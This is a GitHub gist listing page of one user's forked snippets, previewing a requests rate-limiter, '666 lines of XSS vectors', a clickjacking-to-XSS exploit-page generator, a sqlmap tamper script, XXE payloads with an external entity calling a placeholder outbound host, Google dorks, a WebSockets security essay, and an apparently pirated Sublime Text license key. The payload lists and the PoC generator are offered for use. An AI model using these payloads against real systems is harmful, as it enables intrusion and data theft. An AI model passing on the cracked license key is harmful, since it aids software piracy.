Skip to content

Instantly share code, notes, and snippets.

View Expertasif's full-sized avatar

Asif baig Expertasif

90 followers · 572 following
View GitHub Profile
@Expertasif
Expertasif / ratelimiter.py
Created September 16, 2018 08:08 — forked from mwielgoszewski/ratelimiter.py
A GitHub rate-limiting adapter for the requests module.
# -*- coding: utf-8 -*-
'''
Usage:
session = requests.Session()
session.mount('https://', RateLimitAdapter())
'''
from datetime import datetime
from collections import deque
import logging
@Expertasif
Expertasif / 666_lines_of_XSS_vectors.html
Created December 1, 2017 14:10 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@Expertasif
Expertasif / ngrok-selfhosting-setup.md
Created November 21, 2017 05:11 — forked from lyoshenka/ngrok-selfhosting-setup.md
How to setup Ngrok with a self-signed SSL cert

Intro

The plan is to create a pair of executables (ngrok and ngrokd) that are connected with a self-signed SSL cert. Since the client and server executables are paired, you won't be able to use any other ngrok to connect to this ngrokd, and vice versa.

DNS

Add two DNS records: one for the base domain and one for the wildcard domain. For example, if your base domain is domain.com, you'll need a record for that and for *.domain.com.

Different Operating Systems

@Expertasif
Expertasif / cxp.py
Created November 17, 2017 16:09 — forked from vishwaraj101/cxp.py
clickjack to xss poc
print "Clickjack to Xss"
vector=raw_input('xss vector--> ') #xss payload
html=raw_input('Custom Iframe Code--> ') #custom iframe code
fo=open('exploit.html','w') #creating html file
source_code="""<html><body>
<h1>Clickjack to exploit self xss </h1>
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
"""%(vector)
@Expertasif
Expertasif / custom_caesar.py
Created October 21, 2017 15:19 — forked from MarkBaggett/custom_caesar.py
Python - SQLMAP - Tamper Script for Custom Caesar Cypher
#!/usr/bin/env python
from lib.core.data import kb
from lib.core.enums import PRIORITY
import string
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
@Expertasif
Expertasif / Sublime Text 3 Build 3103 License Key - CRACK
Created September 20, 2017 08:39 — forked from angrycoffeemonster/Sublime Text 3 Build 3103 License Key - CRACK
Sublime Text 3 Build 3103 License Key - CRACK
I use the first
—– BEGIN LICENSE —–
Michael Barnes
Single User License
EA7E-821385
8A353C41 872A0D5C DF9B2950 AFF6F667
C458EA6D 8EA3C286 98D1D650 131A97AB
AA919AEC EF20E143 B361B1E7 4C8B7F04
@Expertasif
Expertasif / google-dorks
Created September 17, 2017 09:54 — forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@Expertasif
Expertasif / WebSockets.md
Created September 13, 2017 07:34 — forked from subudeepak/WebSockets.md
The problems and some security implications of websockets - Cross-site WebSockets Scripting (XSWS)

WebSockets - An Introduction

WebSockets is a modern HTML5 standard which makes communication between client and server a lot more simpler than ever. We are all familiar with the technology of sockets. Sockets have been fundamental to network communication for a long time but usually the communication over the browser has been restricted. The general restrictions

  • The server used to have a permanent listener while the client (aka browser) was not designated any fixed listener for a more long term connection. Hence, every communication was restricted to the client demanding and the server responding.
  • This meant that unless the client requested for a particular resource, the server was unable to push such a resource to the client.
  • This was detrimental since the client is then forced to check with the server at regular intervals. This meant a lot of libraries focused on optimizing asynchronous calls and identifying the response of asynchronous calls. Notably t
@Expertasif
Expertasif / XXE_payloads
Created September 1, 2017 14:38 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>